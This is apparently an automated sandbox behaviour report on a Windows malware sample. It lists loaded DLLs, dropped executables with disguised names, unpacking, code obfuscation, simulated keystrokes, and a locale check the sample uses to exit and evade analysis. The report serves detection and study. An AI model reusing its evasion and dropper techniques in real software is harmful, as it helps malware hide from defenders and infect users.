Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: M13W1o3scc.exe

Static file information: File size 1210490 > 1048576

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.jozizud:R;.raxup:R;.maweb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

PE file contains sections with non-standard names

Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .jozizud
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .raxup
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .maweb
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .jozizud
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .raxup
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .maweb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DE93F push edi; ret	15_2_000DE941
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEA58 push esi; ret	15_2_000DEA5A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118A4A push FFFFFF8Bh; iretd	15_2_00118A4C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D8B75 push ecx; ret	15_2_000D8B88
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CCBDB push eax; retf	15_2_000CCBF8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEC33 push esi; ret	15_2_000DEC35
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DED1C push edi; ret	15_2_000DED1E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411716 push ecx; ret	15_2_00411729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00410D35 push ecx; ret	15_2_00410D48
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0043EFB3 push dword ptr [esp+ecx-75h]; iretd	15_2_0043EFB7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B035 push ecx; ret	16_2_0041B048
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040020D pushfd ; iretd	16_2_00400211
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79FD push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8DFB push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79EE push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E4A1F push 7DD07DC0h; iretd	16_2_007E4A30
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8E02 push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E3F19 pushfd ; iretd	16_2_007E3F1C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB29C push ecx; ret	16_2_022BB2AF

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Jump to dropped file

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_001359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		15_2_001359B3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		15_2_000C5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_000D33B7

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 501			Jump to behavior
